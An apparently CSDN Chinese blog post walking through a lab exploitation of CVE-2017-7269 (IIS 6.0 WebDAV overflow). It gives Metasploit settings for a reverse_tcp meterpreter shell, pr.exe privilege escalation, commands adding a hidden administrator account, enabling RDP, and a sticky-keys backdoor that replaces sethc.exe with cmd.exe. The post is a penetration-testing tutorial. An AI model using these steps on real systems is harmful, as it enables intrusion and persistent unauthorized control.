iis6.0远程代码执行(CVE-2017-7269)

iis6.0远程代码执行(CVE-2017-7269)

Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞
修复:
关闭IIS 下的WebDAV服务
2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016。

环境搭建

使用windows server 2003 R2
在这里插入图片描述
下载安装iis,这里我没有挂载光盘,网上下的iis安装包(已经安装好了,放个图)
在这里插入图片描述
这里我加了个默认页面
在这里插入图片描述
配置iis服务
在这里插入图片描述
测试环境准备就绪
window server 2003(靶机):192.168.162.132
kali(攻击机):192.168.162.128

EXP利用

下载
把exp 复制到kali攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
打开Metasploit,使用我们刚才下载的exp
在这里插入图片描述
设置

msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.162.132 #目标机ip
RHOST => 192.168.162.132
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.162.132 #目标网站
HttpHost => 192.168.162.132
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp #返回荷载
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.162.128 #攻击机IP
LHOST => 192.168.162.128
msf exploit(windows/iis/cve-2017-7269) > 

在这里插入图片描述
攻击后返回meterpreter附:相关命令

提权

当前权限:
在这里插入图片描述
无法执行添加用户等命令
尝试上传asp木马到wwwroot目录(权限不足)
在这里插入图片描述
思考其他方法
尝试窃取管理员身份验证
meterpreter使用ps命令查看目标主机进程
未发现发现存在以system运行的进程,尴尬了
发现部分目录可以上传,上传pr.exe提权工具
在这里插入图片描述
使用pr.exe执行命令
在这里插入图片描述
在添加用户时遇到问题,最后找到原因是win2003密码策略的原因,解决方案
解决后添加administrators用户

pr.exe "net user test123 test123 /add"
pr.exe "net localgroup administrators test123 /add"

在这里插入图片描述
netstat -an查看当前开放端口及服务(未拿到shell的话nmap扫也可以)
在这里插入图片描述
当前机器未开放3389远程桌面服务
上传3389开启工具
在这里插入图片描述
执行
在这里插入图片描述
netstat -an查看,成功开启
在这里插入图片描述
这时我们就可以用我们创建的test123用户远程连接到这台服务器上了

预留shift后门

sethc.exe存在于
c:\windows\system32\sethc.exe或c:\windows\system32\dllcache\sethc.exe
根据当前win2003环境sethc.exe存在的路径
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
这里我就简单的使用cmd.exe替换sethc.exe,有空的话自己写一个启动方式
在这里插入图片描述
在这里插入图片描述
这个后门返回的shell权限还是system,尝试nt authority\network service修改sethc.exe,竟然也成功了,所以当目标主机开启了3389,直接用shift后门体全部就可以。

入侵总结及修复处理

iis6.0远程代码执行的修复

shift后门的防御手段

参考文章:
https://blog.csdn.net/darkhq/article/details/79127820

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值